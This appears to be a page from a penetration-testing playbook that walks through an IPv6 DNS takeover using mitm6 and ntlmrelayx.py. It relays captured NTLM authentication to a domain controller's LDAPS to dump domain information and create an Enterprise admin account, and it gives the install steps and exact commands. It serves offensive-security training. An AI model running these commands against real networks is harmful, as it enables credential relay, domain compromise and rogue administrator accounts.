Tech With ZDefense PlaybookWeb Exploitation Playbook

IPv6 Attack

Introduction

Most of the time IPv4 is utilized in a Windows environment instead of IPv6. You may encounter networks that don’t utilize IPv6, and no one is serving IPv6 DNS. A threat actor can take advantage of this and spoof/create a IPv6 DNS server on the network.

The threat actor will let everyone know that it is the IPv6 DNS server and all IPv6 traffic should go to that server, this will result in where the threat actor can capture Authentication packets from users. These packets come in a form of NTLM packets which can then be used by the attacker to relay those messages in order to authenticate to the Domain Controller (DC).

The attacker can use mitm6 and ntlmrelayx.py to authenticate to the DC and potentially gather information and create new accounts that can be used to attack the network.

IPv6 DNS Takeover via MITM6

Note that you can only run mitm6 in small sprints, about 5-10 minutes at a time. Do NOT run mitm6 and leave it, this can and will cause outages in a network.

Steps

  • Start ntlmrelayx.py.

  • Start mitm6.

  • Wait for an event to occur.

  • Wait for the programs to complete the exploit.

  • Review the dumped domain information.

Install mitm6

GitHub: https://github.com/dirkjanm/mitm6

cd /opt
git clone https://github.com/dirkjanm/mitm6.git
cd /mitm6
sudo pip2 install .

ntlmrelayx.py

Syntax: ntlmrelayx.py -6 -t ldaps://[DC IP] -wh [Any Domain] -l [Dumps Folder]

Note for the domain part, you must still use the windows domain of your target network, you just need to add any subdomain you want.

ntlmrelayx.py -6 -t ldaps://10.1.1.100 -wh fakewpad.marvel.local -l dumps
ntlmrelayx.py

mitm6

Syntax: sudo mitm6 -d [domain]

sudo mitm6 -d contoso.local
mitm6.py

After running ntlmrelayx.py and mitm6, wait for an event to occur, this can be a person restarting the machine or a user logging in. Once an event has triggered both programs will automatically run the exploits and dump information.

ntlmrelayx.py Attack

It was able to gather domain information from the target machine and was also able to create an Enterprise admin account.

mitm6 Attack

Domain Information Dump

The following screenshots shows the files that were created containing the domain's information.

PreviousGaining Shell AccessNextPost-Compromise Enumeration

Last updated